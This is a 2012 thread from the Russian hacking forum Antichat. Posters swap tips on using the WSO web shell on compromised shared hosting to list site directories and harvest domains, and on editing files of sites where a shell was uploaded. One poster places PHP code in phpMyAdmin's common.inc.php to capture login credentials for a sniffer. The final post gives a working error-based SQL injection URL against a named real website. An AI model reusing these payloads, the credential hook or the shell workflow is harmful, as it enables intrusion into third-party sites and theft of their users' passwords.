ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
22.08.2012, 05:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
Сообщение от WendM
WendM said:
Ребята, вы так и не дали ответ на мой еще один вопрос. В каком шеле можно посмотреть дерево каталогов?, т.е все папки и под папки
WSO.
|
|
|
|
22.08.2012, 08:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
11466
Репутация:
3
|
|
Сообщение от OxoTnik
OxoTnik said:
WSO.
Там через консоль? Если да то какую команду вбить?
|
|
|
|
22.08.2012, 08:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
9919
Репутация:
0
|
|
WendM
если права на чтение есть то без консоли домашняя должна быть видна
можно и через консоль: ls -l -a
|
|
|
|
22.08.2012, 10:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
11466
Репутация:
3
|
|
Сообщение от jasp3r
jasp3r said:
WendM
если права на чтение есть то без консоли домашняя должна быть видна
можно и через консоль: ls -l -a
права есть, и все я вижу. Суть в том что там много папок, в них папки сайтов, название папки=домен сайта. Так вот, что бы мне руками не шустрить все папки, и не выписывать все домены, я хочу вызвать дерево директорий, потом спарсить названия доменов
Сообщение от jasp3r
jasp3r said:
WendM
можно и через консоль: ls -l -a
только почему то ноль реакции.
P.S Сижу под пользователем Apache.
|
|
|
|
22.08.2012, 13:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
11466
Репутация:
3
|
|
Как отослать на снифер пароль введенный в phpmyadmin? Тренируюсь на локалки, для теста добавил в index.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_username'[/COLOR][COLOR="#007700"]]))
{
[/COLOR][COLOR="#0000BB"]$get_user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_username'[/COLOR][COLOR="#007700"]];
echo[/COLOR][COLOR="#0000BB"]$post_user[/COLOR][COLOR="#007700"];
}
if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_password'[/COLOR][COLOR="#007700"]]))
{
[/COLOR][COLOR="#0000BB"]$get_pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_password'[/COLOR][COLOR="#007700"]];
echo[/COLOR][COLOR="#0000BB"]$post_pass[/COLOR][COLOR="#007700"];
}[/COLOR][/COLOR]
но ни чего не выходит, переменные $get_pass $get_user пустые. Что не так? |
|
|
|
22.08.2012, 13:31
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от WendM
WendM said:
Как отослать на снифер пароль введенный в phpmyadmin? Тренируюсь на локалки, для теста добавил в index.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_username'[/COLOR][COLOR="#007700"]]))
{
[/COLOR][COLOR="#0000BB"]$get_user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_username'[/COLOR][COLOR="#007700"]];
echo[/COLOR][COLOR="#0000BB"]$post_user[/COLOR][COLOR="#007700"];
}
if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_password'[/COLOR][COLOR="#007700"]]))
{
[/COLOR][COLOR="#0000BB"]$get_pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_password'[/COLOR][COLOR="#007700"]];
echo[/COLOR][COLOR="#0000BB"]$post_pass[/COLOR][COLOR="#007700"];
}[/COLOR][/COLOR]
но ни чего не выходит, переменные $get_pass $get_user пустые. Что не так? А если так ?
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_username'[/COLOR][COLOR="#007700"]]))
{
[/COLOR][COLOR="#0000BB"]$get_user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_username'[/COLOR][COLOR="#007700"]];
echo[/COLOR][COLOR="#0000BB"]$get_user[/COLOR][COLOR="#007700"];
}
if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_password'[/COLOR][COLOR="#007700"]]))
{
[/COLOR][COLOR="#0000BB"]$get_pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_password'[/COLOR][COLOR="#007700"]];
echo[/COLOR][COLOR="#0000BB"]$get_pass[/COLOR][COLOR="#007700"];
}[/COLOR][/COLOR]
$get_pass и $get_user как раз не пустые, а вот выводимые на экран данные $post_pass $post_user - пустые.
|
|
|
22.08.2012, 13:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
11466
Репутация:
3
|
|
Сообщение от BigBear
BigBear said:
А если так ?
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_username'[/COLOR][COLOR="#007700"]]))
{
[/COLOR][COLOR="#0000BB"]$get_user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_username'[/COLOR][COLOR="#007700"]];
echo[/COLOR][COLOR="#0000BB"]$get_user[/COLOR][COLOR="#007700"];
}
if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_password'[/COLOR][COLOR="#007700"]]))
{
[/COLOR][COLOR="#0000BB"]$get_pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_password'[/COLOR][COLOR="#007700"]];
echo[/COLOR][COLOR="#0000BB"]$get_pass[/COLOR][COLOR="#007700"];
}[/COLOR][/COLOR]
$get_pass и $get_user как раз не пустые, а вот выводимые на экран данные$post_user $post_pass - пустые. ой, я тупанул. Просто забыл переименовать когда сюда постил. Т.е $get_pass= $post_pass и $get_user=$post_user.
А так вопрос решен, там в индексе инклуидится common.inc.php, вот в него и прописываем (в самое начало)
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_username'[/COLOR][COLOR="#007700"]]))
{
[/COLOR][COLOR="#0000BB"]$get_user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_username'[/COLOR][COLOR="#007700"]];
echo[/COLOR][COLOR="#0000BB"]$get_user[/COLOR][COLOR="#007700"];
}
if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_password'[/COLOR][COLOR="#007700"]]))
{
[/COLOR][COLOR="#0000BB"]$get_pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_password'[/COLOR][COLOR="#007700"]];
echo[/COLOR][COLOR="#0000BB"]$get_pass[/COLOR][COLOR="#007700"];
}[/COLOR][/COLOR]
Всем спасибо за внимание
|
|
|
|
22.08.2012, 17:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
11466
Репутация:
3
|
|
Сообщение от BigBear
BigBear said:
Права -rw-r--r-- указывают на то, что файл доступен на редактирование только создателю
Странно, залил шел на другой сайт, права теже, но редактирую спокойно любые файлы сайта. В чем фишка ?
На том сайте где не могу редактировать сижу под пользователем Apache, могу ходить по всем сайтам на хостинге
|
|
|
|
22.08.2012, 21:22
|
|
Новичок
Регистрация: 05.01.2010
Сообщений: 9
Провел на форуме:
13018
Репутация:
0
|
|
http://myrusland.ru/maps_regions_'.htm
Все попытки раскрутить не приводили к успеху, вроде как всего 1 таблица, хотя я могу ошибаться.
|
|
|
|
22.08.2012, 21:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
17560
Репутация:
0
|
|
http://myrusland.ru/maps_regions_'and(select*from(select(name_const(ve rsion(),1)),name_const(version(),1))a)and(1)='1+--+.htm
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
